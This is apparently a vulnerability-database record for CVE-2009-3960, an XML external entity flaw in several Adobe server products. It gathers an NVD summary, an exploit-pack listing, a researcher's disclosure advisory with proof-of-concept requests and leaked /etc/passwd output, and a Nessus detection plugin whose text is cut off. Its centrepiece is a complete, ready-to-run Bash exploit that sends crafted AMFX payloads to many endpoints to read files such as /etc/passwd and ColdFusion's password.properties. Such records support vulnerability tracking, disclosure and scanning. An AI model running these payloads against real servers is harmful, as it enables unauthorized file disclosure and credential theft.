{"cve": [{"lastseen": "2017-08-16T11:22:43", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in BlazeDS 3.2 and earlier, as used in LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0, allows remote attackers to obtain sensitive information via vectors that are associated with a request, and related to injected tags and external entity references in XML documents.", "modified": "2017-08-15T21:29:00", "published": "2010-02-15T13:30:00", "id": "CVE-2009-3960", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3960", "title": "CVE-2009-3960", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "d2": [{"lastseen": "2016-09-25T14:11:07", "bulletinFamily": "exploit", "description": "**Name**| d2sec_adobe \n---|--- \n**CVE**| CVE-2009-3960 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| d2sec_adobe \n**Notes**| \n", "modified": "2010-02-15T13:30:00", "published": "2010-02-15T13:30:00", "id": "D2SEC_ADOBE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_adobe", "title": "DSquare Exploit Pack: D2SEC_ADOBE", "type": "d2", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2017-04-11T17:17:42", "bulletinFamily": "exploit", "description": "Adobe Multiple Products - XML Injection File Content Disclosure. CVE-2009-3960. Webapps exploit for XML platform", "modified": "2017-04-07T00:00:00", "published": "2017-04-07T00:00:00", "id": "EDB-ID:41855", "href": "https://www.exploit-db.com/exploits/41855/", "type": "exploitdb", "title": "Adobe Multiple Products - XML Injection File Content Disclosure", "sourceData": "#!/bin/bash\r\n#\r\n# Source: https://raw.githubusercontent.com/tsluyter/exploits/master/adobe_xml_inject.sh\r\n# Exploit Title: Adobe XML Injection file content disclosure\r\n# Date: 07-04-2017\r\n# Exploit Author: Thomas Sluyter\r\n# Website: https://www.kilala.nl\r\n# Vendor Homepage: http://www.adobe.com/support/security/bulletins/apsb10-05.html\r\n# Version: Multiple Adobe products\r\n# Tested on: Windows Server 2003, ColdFusion 8.0 Enterprise\r\n# CVE : 2009-3960\r\n#\r\n# Shell script that let's you exploit a known XML injection vulnerability\r\n# in a number of Adobe products, allowing you to read files that are otherwise\r\n# inaccessible. In Metasploit, this is achieved with auxiliary:scanner:adobe_xml_inject\r\n# This script is a Bash implementation of the PoC multiple/dos/11529.txt.\r\n#\r\n# According to the original Metasploit code, this attack works with:\r\n# \t\"Multiple Adobe Products: BlazeDS 3.2 and earlier versions, \r\n# \t LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1,\r\n#\t and 2.5.1, Flex Data Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2\"\r\n#\r\n\r\n\r\nPROGNAME=\"$(basename $0)\" # This script\r\nTIMESTAMP=$(date +%y%m%d%H%M) # Used for scratchfiles\r\nSCRATCHFILE=\"/tmp/${PROGNAME}.${TIMESTAMP}\" # Used as generic scratchfile\r\nEXITCODE=\"0\"\t\t\t\t\t# Assume success, changes on errors\r\nCURL=\"/usr/bin/curl\"\t\t\t\t# Other locations are detected with \"which\"\r\n\r\nSSL=\"0\"\t\t\t\t\t\t# Overridden by -s\r\nDEBUG=\"0\"\t\t\t\t\t# Overridden by -d\r\nBREAKFOUND=\"0\"\t\t\t\t\t# Overridden by -b\r\nTARGETHOST=\"\"\t\t\t\t\t# Overridden by -h\r\nTARGETPORT=\"8400\"\t\t\t\t# Overridden by -p\r\nREADFILE=\"/etc/passwd\"\t\t\t\t# Overridden by -f\r\n\r\n\r\n################################## OVERHEAD SECTION \r\n# \r\n# Various functions for overhead purposes.\r\n#\r\n\r\n# Defining our own logger function, so we can switch between stdout and syslog.\r\nlogger() {\r\n LEVEL=\"$1\"\r\n MESSAGE=\"$2\"\r\n\r\n\t# You may switch the following two, if you need to log to syslog.\r\n #[[ ${DEBUG} -gt 0 ]] && echo \"${LEVEL} $MESSAGE\" || /usr/bin/logger -p ${LEVEL} \"$MESSAGE\"\r\n [[ ${DEBUG} -gt 0 ]] && echo \"${LEVEL} $MESSAGE\" || echo \"${LEVEL} $MESSAGE\"\r\n}\r\n\r\n\r\nExitCleanup() {\r\n\tEXITCODE=${1} \r\n\trm -f ${SCRATCHFILE}* >/dev/null 2>&1\r\n\techo \"\"\r\n\texit ${EXITCODE}\r\n}\r\n\r\n\r\n# Many thanks to http://www.linuxjournal.com/content/validating-ip-address-bash-script\r\nValidIP() {\r\n local IP=${1}\r\n local STAT=1\r\n\r\n if [[ ${IP} =~ ^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}$ ]]\r\n then\r\n OIFS=$IFS; IFS='.'\r\n IP=(${IP})\r\n IFS=$OIFS\r\n [[ (${IP[0]} -le 255) && (${IP[1]} -le 255) && (${IP[2]} -le 255) && (${IP[3]} -le 255) ]]\r\n stat=$?\r\n fi\r\n return $stat\r\n}\r\n\r\n\r\n# Function to output help information.\r\nshow-help() {\r\n echo \"\"\r\n cat << EOF\r\n ${PROGNAME} [-?] [-d] [-s] [-b] -h host [-p port] [-f file]\r\n\r\n\t -? Show this help message.\r\n\t -d Debug mode, outputs more kruft on stdout.\r\n\t -s Use SSL / HTTPS, instead of HTTP.\r\n\t -b\tBreak on the first valid answer found.\r\n\t -h\tTarget host\r\n\t -p\tTarget port, defaults to 8400.\r\n\t -f\tFull path to file to grab, defaults to /etc/passwd.\r\n\r\n\tThis script exploits a known vulnerability in a set of Adobe applications. Using one \r\n\tof a few possible URLs on the target host (-h) we attempt to read a file (-f) that is\r\n\tnormally inaccessible. \r\n\r\n\tNOTE: Windows paths use \\\\, so be sure to properly escape them when using -f! For example:\r\n\t${PROGNAME} -h 192.168.1.20 -f c:\\\\\\\\coldfusion8\\\\\\\\lib\\\\\\\\password.properties\r\n\t${PROGNAME} -h 192.168.1.20 -f 'c:\\\\coldfusion8\\\\lib\\\\password.properties'\r\n\r\n\tThis script relies on CURL, so please have it in your PATH. \r\n\r\nEOF\r\n}\r\n\r\n\r\n# Parsing and verifying the passed parameters.\r\nOPTIND=1 \r\nwhile getopts \"?dsbh:p:f:\" opt; do\r\n case \"$opt\" in\r\n \\?) show-help; ExitCleanup 0 ;;\r\n d) DEBUG=\"1\" ;;\r\n s) SSL=\"1\" ;;\r\n b) BREAKFOUND=\"1\" ;;\r\n h) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1)\r\n\tValidIP ${OPTARG}; if [[ $? -eq 0 ]]\r\n\tthen TARGETHOST=${OPTARG}\r\n\telse TARGETHOST=$(nslookup ${OPTARG} | grep ^Name | awk '{print $2}')\r\n\t [[ $? -gt 0 ]] && (logger ERROR \"Target host ${TARGETHOST} not found in DNS.\"; ExitCleanup 1)\r\n\tfi ;;\r\n p) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1)\r\n\tif [[ ! -z $(echo ${OPTARG} | tr -d '[:alnum:]') ]]\r\n\tthen logger ERROR \"Target port ${OPTARG} is incorrect.\"; ExitCleanup 1\r\n\telse TARGETPORT=${OPTARG}\r\n\tfi ;;\r\n f) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1)\r\n\tif [[ (-z $(echo ${OPTARG} | grep ^\\/)) && (-z $(echo ${OPTARG} | grep ^[a-Z]:)) ]]\r\n\tthen logger ERROR \"File is NOT specified with full Unix or Windows path.\"; ExitCleanup 1\r\n\telse READFILE=${OPTARG}\r\n\tfi ;;\r\n *) show-help; ExitCleanup 0 ;;\r\n esac\r\ndone\r\n\r\n[[ $(which curl) ]] && CURL=$(which curl) || (logger ERROR \"CURL was not found.\"; ExitCleanup 1)\r\n[[ -z ${TARGETHOST} ]] && (logger ERROR \"Target host was not set.\"; ExitCleanup 1)\r\n\r\n[[ ${DEBUG} -gt 0 ]] && logger DEBUG \"Proceeding with host/port/file: ${TARGETHOST},${TARGETPORT},${READFILE}.\"\r\n\r\n\r\n################################## GETTING TO WORK\r\n# \r\n#\r\n\r\nPATHLIST=(\"/flex2gateway/\" \"/flex2gateway/http\" \"/flex2gateway/httpsecure\" \\\r\n \"/flex2gateway/cfamfpolling\" \"/flex2gateway/amf\" \"/flex2gateway/amfpolling\" \\\r\n \"/messagebroker/http\" \"/messagebroker/httpsecure\" \"/blazeds/messagebroker/http\" \\\r\n \"/blazeds/messagebroker/httpsecure\" \"/samples/messagebroker/http\" \\\r\n \"/samples/messagebroker/httpsecure\" \"/lcds/messagebroker/http\" \\\r\n \"/lcds/messagebroker/httpsecure\" \"/lcds-samples/messagebroker/http\" \\\r\n \"/lcds-samples/messagebroker/httpsecure\")\r\n\r\necho \"<?xml version=\\\"1.0\\\" encoding=\\\"utf-8\\\"?>\" > ${SCRATCHFILE}\r\necho \"<!DOCTYPE test [ <!ENTITY x3 SYSTEM \\\"${READFILE}\\\"> ]>\" >> ${SCRATCHFILE}\r\necho \"<amfx ver=\\\"3\\\" xmlns=\\\"http://www.macromedia.com/2005/amfx\\\">\" >> ${SCRATCHFILE}\r\necho \"<body><object type=\\\"flex.messaging.messages.CommandMessage\\\"><traits>\" >> ${SCRATCHFILE}\r\necho \"<string>body</string><string>clientId</string><string>correlationId</string><string>destination</string>\" >> ${SCRATCHFILE}\r\necho \"<string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string>\" >> ${SCRATCHFILE}\r\necho \"<string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object>\" >> ${SCRATCHFILE}\r\necho \"<traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string>\" >> ${SCRATCHFILE}\r\necho \"<int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>\" >> ${SCRATCHFILE}\r\n\r\nif [[ ${DEBUG} -gt 0 ]] \r\nthen\r\n logger DEBUG \"XML file sent to target host reads as follows:\"\r\n echo \"======================================\"\r\n cat ${SCRATCHFILE}\r\n echo \"======================================\"\r\n echo \"\"\r\nfi\r\n\r\nlet CONTENTLENGTH=$(wc -c ${SCRATCHFILE} | awk '{print $1}')-1\r\n\r\nfor ADOBEPATH in \"${PATHLIST[@]}\"\r\ndo\r\n [[ ${SSL} -gt 0 ]] && PROTOCOL=\"https\" || PROTOCOL=\"http\"\r\n URI=\"${PROTOCOL}://${TARGETHOST}:${TARGETPORT}${ADOBEPATH}\"\r\n\r\n [[ ${DEBUG} -gt 0 ]] && logger DEBUG \"Proceeding with URI: ${URI}\"\r\n\r\n # Header contents based on a tcpdump capture of original exploit being\r\n # run from Metasploit.\r\n HEADER=\"-H \\\"Host: ${TARGETHOST}\\\" -H \\\"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\\\" -H \\\"Content-Type: application/x-www-form-urlencoded\\\" -H \\\"Content-Length: ${CONTENTLENGTH}\\\"\"\r\n\r\n CURLPOST=\"${CURL} -X POST -k -s --http1.1 ${HEADER} -w \\\"%{http_code}\\\" -d @- ${URI}\"\r\n\r\n [[ ${DEBUG} -gt 0 ]] && logger DEBUG \"Using this CURL command: ${CURLPOST}\"\r\n\r\n # The tr command dikes out any non-ASCII characters which might mess with output.\r\n CURLOUTPUT=$(cat ${SCRATCHFILE} | ${CURLPOST} | tr -cd '\\11\\12\\15\\40-\\176' 2>&1)\r\n\r\n # Output is pretty garbled and the HTTP return code is enclosed in double quotes.\r\n # I need to grab the last 5 chars (includes NULL EOF) and remove the \".\r\n CURLCODE=$(echo ${CURLOUTPUT} | tail -c5 | tr -cd [:digit:])\r\n\r\n if [[ ${DEBUG} -gt 0 ]] \r\n then\r\n\tlogger DEBUG \"CURL was given this HTTP return code: ${CURLCODE}.\"\r\n\tlogger DEBUG \"Output from CURL reads as follows:\"\r\n echo \"======================================\"\r\n\techo \"${CURLOUTPUT}\"\r\n echo \"======================================\"\r\n\techo \"\"\r\n fi\r\n\r\n logger INFO \"${CURLCODE} for ${URI}\"\r\n\r\n if [[ (${CURLCODE} -eq 200) && (! -z $(echo ${CURLOUTPUT} | grep \"<?xml version=\")) ]] \r\n then \r\n\techo \"Read from ${URI}:\"\r\n\techo \"${CURLOUTPUT}\" | sed 's/^[^<]*</</'\r\n\t[[ ${BREAKFOUND} -gt 0 ]] && ExitCleanup 0\r\n fi\r\n\r\n if [[ ${DEBUG} -gt 0 ]] \r\n then \r\n\techo -e \"\\nReady to continue with the next URI? [y/n]: \\c\"\r\n \tread READY\r\n\tcase ${READY} in\r\n\t y|Y|yes) logger DEBUG \"Moving to next URI.\"; echo \"\" ;;\r\n\t *) logger DEBUG \"Aborting...\"; ExitCleanup 1 ;;\r\n\tesac\r\n fi\r\ndone\r\n\r\n\r\nExitCleanup 0\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/41855/"}, {"lastseen": "2016-02-01T14:30:09", "bulletinFamily": "exploit", "description": "Multiple Adobe Products XML External Entity And XML Injection Vulnerabilities. CVE-2009-3960. Dos exploits for multiple platform", "modified": "2010-02-22T00:00:00", "published": "2010-02-22T00:00:00", "id": "EDB-ID:11529", "href": "https://www.exploit-db.com/exploits/11529/", "type": "exploitdb", "title": "Multiple Adobe Products XML External Entity And XML Injection Vulnerabilities", "sourceData": " ( , ) (,\r\n . `.' ) ('. ',\r\n ). , ('. ( ) (\r\n (_,) .`), ) _ _,\r\n / _____/ / _ \\ ____ ____ _____ \r\n \\____ \\==/ /_\\ \\ _/ ___\\/ _ \\ / \\ \r\n / \\/ | \\\\ \\__( <_> ) Y Y \\\r\n/______ /\\___|__ / \\___ >____/|__|_| /\r\n \\/ \\/.-. \\/ \\/:wq \r\n (x.0)\r\n '=.|w|.='\r\n _='`\"``=.\r\n\r\n\t\tpresents..\r\n\r\nMultiple Adobe Products\r\nXML External Entity And XML Injection Vulnerabilities\r\n\r\nCVE: CVE-2009-3960\r\nAdobe PSIRT: APSB10-05 - http://www.adobe.com/support/security/bulletins/apsb10-05.html\r\nLink: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf\r\n\r\n+-----------+\r\n|Description|\r\n+-----------+\r\n\r\nSecurity-Assessment.com discovered that multiple Adobe \r\nproducts with different Data Services versions are \r\nvulnerable to XML External Entity (XXE) and XML \r\ninjection attacks. \r\nXML external Entities injection allows a wide range of\r\nXML based attacks, including local file disclosure, \r\nTCP scans and Denial of Service condition, which can \r\nbe achieved by recursive entity injection, attribute \r\nblow up and other types of injection. \r\nFor more information about the implications associated\r\nto this vulnerability, refer to the RFC2518 (17.7 \r\nImplications of XML External Entities): \r\nhttp://www.ietf.org/rfc/rfc2518.txt\r\n\r\n+--------------+\r\n|Product Review|\r\n+--------------+\r\n\r\nAdobe Data Services components provide Flex/RIA \r\napplications with data messaging, remoting and \r\nmanagement capabilities.\r\n\r\nThe discovered vulnerabilities affect the HTTPChannel\r\n servlet classes which are respectively \r\n\u201cmx.messaging.channels.HTTPChannel\u201d and \r\n\u201cmx.messaging.channels.SecureHTTPChannel\u201d. These \r\nclasses are part of the Data Services Messaging \r\nclasses and can be found in the \r\nflex-messaging-common.jar Java archive.\r\n\r\nThe HTTPChannel transports data in the AMFX format, \r\nwhich is the text-based XML representation of AMF. \r\nThe HTTPChannel endpoints are defined in the \r\nservices-config.xml file, located within the \r\nFlex/WEB-INF folder of the application. \r\nBy default, the HTTPChannel classes are mapped to \r\nthe following endpoints:\r\n\r\n1. http://{server.name}:{server.port}/{context.root}/messagebroker/http\r\n2. https://{server.name}:{server.port}/{context.root}/messagebroker/httpsecure\r\n\r\nNote that the HTTPChannel may be mapped to different \r\nendpoints. \r\nThis depends on the deployed application and the \r\nframework in use (e.g. BlazeDS, Adobe LiveCycle \r\nData Services, etc.).\r\n\r\n+--------------------------------------------+\r\n|Exploitation - XML External Entity Injection|\r\n+--------------------------------------------+\r\n\r\nXML entities can be declared and included within AMFX\r\nrequests passed to the HTTPChannel. The XML parser \r\nparses the payload and successfully processes \r\ninjected entities.\r\n\r\nThe following table shows an example of XML external\r\nentity injection which leads to local file disclosure.\r\nThe AMFX request is sent via the HTTPChannel endpoint\r\nin BlazeDS.\r\n\r\nXML External Entity Injection \u2013 Local File Disclosure\r\nPoC \u2013 BlazeDS \u2013 Request\r\n\r\nPOST /samples/messagebroker/http HTTP/1.1\r\nContent-type: application/x-amf\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<!DOCTYPE test [ <!ENTITY x3 SYSTEM \"/etc/passwd\"> ]>\r\n<amfx ver=\"3\" xmlns=\"http://www.macromedia.com/2005/amfx\">\r\n <body>\r\n <object type=\"flex.messaging.messages.CommandMessage\">\r\n <traits>\r\n <string>body</string><string>clientId</string><string>correlationId</string>\r\n <string>destination</string><string>headers</string><string>messageId</string>\r\n <string>operation</string><string>timestamp</string><string>timeToLive</string>\r\n </traits><object><traits />\r\n </object>\r\n <null /><string /><string />\r\n <object>\r\n <traits>\r\n <string>DSId</string><string>DSMessagingVersion</string>\r\n </traits>\r\n <string>nil</string><int>1</int>\r\n </object>\r\n <string>&x3;</string>\r\n<int>5</int><int>0</int><int>0</int>\r\n </object>\r\n </body>\r\n</amfx>\r\n\r\n\r\nXML External Entity Injection \u2013 Local File Inclusion\r\nPoC \u2013 BlazeDS \u2013 Response\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<amfx ver=\"3\"><header name=\"AppendToGatewayUrl\" mustUnderstand=\"true\">\r\n<string>;jsessionid=2191D3647221B72039C5B05D38084A42</string></header>\r\n<body targetURI=\"/onResult\" responseURI=\"\">\r\n<object type=\"flex.messaging.messages.AcknowledgeMessage\">\r\n<traits><string>timestamp</string><string>headers</string>\r\n<string>body</string><string>correlationId</string>\r\n<string>messageId</string><string>timeToLive</string>\r\n<string>clientId</string><string>destination</string>\r\n</traits><double>1.257387140632E12</double><object>\r\n<traits><string>DSMessagingVersion</string>\r\n<string>DSId</string></traits><double>1.0</double>\r\n<string>BDE929FE-270D-3B56-1061-616E8B938429</string>\r\n</object><null/><string>root:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\r\nbin:x:2:2:bin:/bin:/bin/sh\r\nsys:x:3:3:sys:/dev:/bin/sh\r\nsync:x:4:65534:sync:/bin:/bin/sync\r\ngames:x:5:60:games:/usr/games:/bin/sh\r\nman:x:6:12:man:/var/cache/man:/bin/sh\r\nlp:x:7:7:lp:/var/spool/lpd:/bin/sh\r\n[...]\r\n\r\n\r\nThe above injection was successfully tested on \r\nmultiple Adobe products, as shown below:\r\n\r\n1. Product: Adobe BlazeDS 3.2.0.39\r\nLinux Ubuntu 9.04 / Tomcat 6.0.14\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n\r\n2. Adobe LiveCycle Data Services ES2 3.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n3. ColdFusion 9.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/http\r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n4. Adobe LiveCycle ES2\r\nWindows XP SP2 / IBM Websphere 7.0\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\nThe vendor has released several patches for this \r\nvulnerability. See the Solution section of this \r\ndocument for more information.\r\n\r\n+----------------------------+\r\n|Exploitation - XML Injection|\r\n+----------------------------+\r\n\r\nThe XML parser lacks of proper input and output \r\nvalidation controls. Security-Assessment.com managed\r\nto inject arbitrary XML content which was returned\r\nin the XML response. \r\nThe following table shows an XML injection in the \r\nBlazeDS HTTPChannel. The injected payload becomes \r\npart of the response. In this case, injection is \r\npossible via the \u201cresponseURI\u201d attribute.\r\n\r\nXMLInjection \u2013 BlazeDS - Request\r\n\r\nPOST /samples/messagebroker/http HTTP/1.1\r\nContent-type: application/x-amf\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<amfx ver=\"3\"><body targetURI=\"\" responseURI=\"d\" injectedattr=\"anything\"><null/>\r\n</body></amfx>\r\n\r\nXMLInjection \u2013 BlazeDS - Response\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<amfx ver=\"3\"><body targetURI=\"d\" injectedattr=\"anything\" responseURI=\"\"><null/></body></amfx></body></amfx>\r\n\r\nThe above injection was successfully tested on \r\nmultiple Adobe products, as shown below:\r\n\r\n1. Product: Adobe BlazeDS 3.2.0.39\r\nLinux Ubuntu 9.04 / Tomcat 6.0.14\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n\r\n2. Adobe LiveCycle Data Services ES2 3.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n3. ColdFusion 9.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/http\r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n4. Adobe LiveCycle ES2\r\nWindows XP SP2 / IBM Websphere 7.0\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n\r\nThe vendor has released several patches for this \r\nvulnerability. See the Solution section of this \r\ndocument for more information.\r\n\r\n\r\n+--------+\r\n|Solution|\r\n+--------+\r\n\r\nSecurity-Assessment.com follows responsible\r\ndisclosure and promptly contacted the vendor after \r\ndiscovering the issues. The vendor was contacted on \r\nthe 6th November 2009 and a reply was received on the\r\nsame day. The vendor released security patches on \r\nthe 11th February 2010.\r\n \r\nThe security patches can be downloaded at the \r\nfollowing website: \r\n\r\nhttp://www.adobe.com/support/security/bulletins/apsb10-05.html\r\n\r\n\r\n+------+\r\n|Credit|\r\n+------+\r\n\r\nDiscovered and advised to Adobe in\r\nNovember 2009 by Roberto Suggi Liverani of Security-\r\nAssessment.com. Personal Page: http://malerisch.net/\r\n\r\nFor full details regarding this vulnerability\r\ndownload the PDF from our website:\r\n\r\nhttp://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf\r\n\r\n\r\n+---------+\r\n|Greetings|\r\n+---------+\r\n\r\nBug found at Hack in The Sun 2009, Waiheke Island.\r\n\r\n\r\n+-----------------------------+\r\n|About Security-Assessment.com|\r\n+-----------------------------+\r\n\r\nSecurity-Assessment.com is a New Zealand based world\r\nleader in web application testing, network security\r\nand penetration testing. Security-Assessment.com\r\nservices organisations across New Zealand, Australia,\r\nAsia Pacific, the United States and the United\r\nKingdom.\r\n\r\nRoberto Suggi Liverani\r\n\r\n\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/11529/"}], "nessus": [{"lastseen": "2019-02-21T01:13:08", "bulletinFamily": "scanner", "description": "The remote host appears to be running an Adobe product that is susceptible to XML External Entity (XXE) attacks. The installed version of the product fails to block the use of external XML entities while using the HTTPChannel to transport data in AMFX format. A remote, unauthenticated attacker could exploit this vulnerability to read arbitrary files from the remote system. \n\nAccording to the Adobe advisory, Adobe BlazeDS, LiveCycle, LiveCycle Data Services, Flex Data Services and ColdFusion are known to be affected by this issue.", "modified": "2018-11-15T00:00:00", "id": "ADOBE_MULTIPLE_PRODUCTS_XXE.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44937", "published": "2010-03-01T00:00:00", "title": "Multiple Adobe Products XML External Entity (XXE) Injection (APSB10-05)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44937);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2018/11/15 20:50:16\");\n\n script_cve_id(\"CVE-2009-3960\");\n script_bugtraq_id(38197);\n script_xref(name:\"EDB-ID\", value:\"11529\");\n script_xref(name:\"Secunia\", value:\"38543\");\n\n script_name(english:\"Multiple Adobe Products XML External Entity (XXE) Injection (APSB10-05)\");\n script_summary(english:\"Attempts to retrieve a local file\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is susceptible to XML External Entity (XXE)\nattacks.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running an Adobe product that is\nsusceptible to XML External Entity (XXE) attacks. The installed\nversion of the product fails to block the use of external XML entities\nwhile using the HTTPChannel to transport data in AMFX format. A\nremote, unauthenticated attacker could exploit this vulnerability to\nread arbitrary files from the remote system. \n\nAccording to the Adobe advisory, Adobe BlazeDS, LiveCycle, LiveCycle\nData Services, Flex Data Services and ColdFusion are known to be\naffected by this issue.\" );\n # http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6688a1e2\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2010/Feb/197\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/support/security/bulletins/apsb10-05.html\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate vendor-supplied patches.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Adobe XML External Entity File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/03/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:adobe:lifecycle\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:adobe:lifecycle_data_services\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:adobe:flex_data_services\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:adobe:coldfusion\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:adobe:blazeds\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\",\"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8400, 8500);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\n\n# Make a list of known HTTPChannel endpoints.\n\n# Check for sample apps only if thorough_tests\n# are enabled\n\nif(thorough_tests)\n{\n if (get_port_transport(port) > ENCAPS_IP)\n {\n urls = make_list(\n \"/flex2gateway/http\", # ColdFusion 9 (disabled by default)\n \"/flex2gateway/httpsecure\", # ColdFusion 9 (disabled by default)\n \"/messagebroker/http\",\n \"/messagebroker/httpsecure\",\n \"/blazeds/messagebroker/http\", # Blazeds 3.2\n \"/blazeds/messagebroker/httpsecure\", #\n \"/samples/messagebroker/http\", # Blazeds 3.2\n \"/samples/messagebroker/httpsecure\", # Blazeds 3.2\n \"/lcds/messagebroker/http\", # LCDS\n 